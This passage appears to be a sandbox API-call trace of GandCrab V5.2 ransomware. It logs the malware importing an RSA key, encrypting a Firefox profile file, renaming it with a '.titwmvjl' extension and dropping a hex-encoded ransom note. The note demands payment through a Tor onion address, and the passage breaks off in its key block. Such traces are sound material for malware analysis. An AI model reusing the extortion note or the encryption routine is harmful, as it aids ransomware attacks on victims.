phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0084.044] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.044] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.044] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.045] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0084.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.045] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.045] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.045] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0084.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.049] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0084.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.049] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0084.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.050] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0084.050] GetLastError () returned 0x0 [0084.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.050] CryptDestroyKey (hKey=0x503578) returned 1 [0084.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.050] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.051] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0084.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.055] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5035b8) returned 1 [0084.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.055] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0084.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.055] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0084.055] GetLastError () returned 0x0 [0084.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.056] CryptDestroyKey (hKey=0x5035b8) returned 1 [0084.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.056] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.056] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.056] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.056] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x120, lpOverlapped=0x0) returned 1 [0084.074] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffee0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.074] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x120, lpOverlapped=0x0) returned 1 [0084.075] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.075] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0084.078] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.083] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.083] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.083] CloseHandle (hObject=0x2d4) returned 1 [0084.085] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessioncheckpoints.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessioncheckpoints.json.titwmvjl"), dwFlags=0x1) returned 1 [0084.086] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.086] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0084.087] lstrcmpW (lpString1="sessionstore-backups", lpString2=".") returned 1 [0084.087] lstrcmpW (lpString1="sessionstore-backups", lpString2="..") returned 1 [0084.087] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="sessionstore-backups" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups" [0084.087] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\" [0084.087] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.087] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.088] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.088] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.088] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.088] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.088] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.088] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.088] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.088] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\\\TITWMVJL-DECRYPT.txt") returned 122 [0084.089] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0084.093] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x